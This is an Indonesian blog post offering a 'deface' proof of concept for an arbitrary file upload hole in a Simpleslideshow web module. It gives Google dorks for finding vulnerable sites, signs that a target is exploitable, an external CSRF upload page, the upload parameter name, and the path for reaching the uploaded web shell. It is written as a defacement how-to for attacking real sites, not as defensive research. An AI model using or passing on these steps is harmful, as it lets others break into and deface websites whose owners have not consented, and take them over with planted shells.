UDAH 2019 YA? SIAPPP, BLOG INI SUDAH BERDIRI 4 TAHUN >:( , DARI TAHUN 2016
TAPIIIIII, TETAP BLOG INI TANPA GOOGLE ADSENSE, EMANG KAYA YG LAIN HAHAHA
TAMPIL BEDA LAH
ok di awal bulan januari tahun 2019, gue akan share poc deface terbaru . yaitu Deface CSRF Modules Simpleslideshow - Arbitrary File Upload
Langsung aja ya
DORK: inurl:modules/simpleslideshow/
inurl:modules/simpleslideshow intitle: index of
EXPLOIT: uploadimage.php
Dorking ke google seperti biasaaa
Ciri ciri vulnerability
Muncul tulisan : error
Selanjutnya pakai CSRF ya untuk upload shellnya
CSRF: http://trolling-system.ooo/csrf.php
Input param name filenya: userfile
Kalau sukses di upload , muncul seperti ini
Muncul; success:namafile.php
Akses shell: site.com/modules/simpleslideshow/slides/shell.php
Ok SEKIAN YA
NOTE: BLOG INI TANPA ADSENSE, JADI JANGAN RAGU UNTUK MAMPIR KESINI YA ^_^, ALHAMDULILLAH TANPA ADSENSE, ADMIN MASIH BISA MAKAN HAHA
TERIMA KASIH SUDAH BERKUNJUNG, SETIAP MINGGU GUE USAHAIN UPLOAD TUTORIAL LAGI!!
Fanpage Facebook >> https://facebook.com/trollyoursystem